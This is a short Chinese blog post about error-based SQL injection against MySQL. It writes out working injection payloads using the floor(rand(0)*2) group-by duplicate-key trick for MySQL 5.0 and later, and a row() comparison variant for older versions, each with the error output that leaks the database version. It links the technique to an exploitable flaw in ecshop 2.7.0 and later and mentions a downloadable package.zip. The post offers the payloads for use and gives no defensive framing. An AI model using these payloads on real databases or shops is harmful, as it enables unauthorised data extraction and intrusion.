昨天无意间读到 http://www.packetstormsecurity.o ... d-SQL-Injection.txt,发现原来可以这样注入:
MySQL >= 5.0 :
执行
select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;
或
select 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
会报错:
Duplicate entry '5.1.30-community1' for key 'group_key'
MySQL < 5 :
执行
select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1);
数次后会报错:
Duplicate entry '4.1.22-community-nt:1' for key 1
正好解决了ecshop最新的漏洞
无礼包限制
影响版本:ecshop >= 2.7.0影响版本:ecshop >= 2.7.0
下载package.zip
没有评论:
发表评论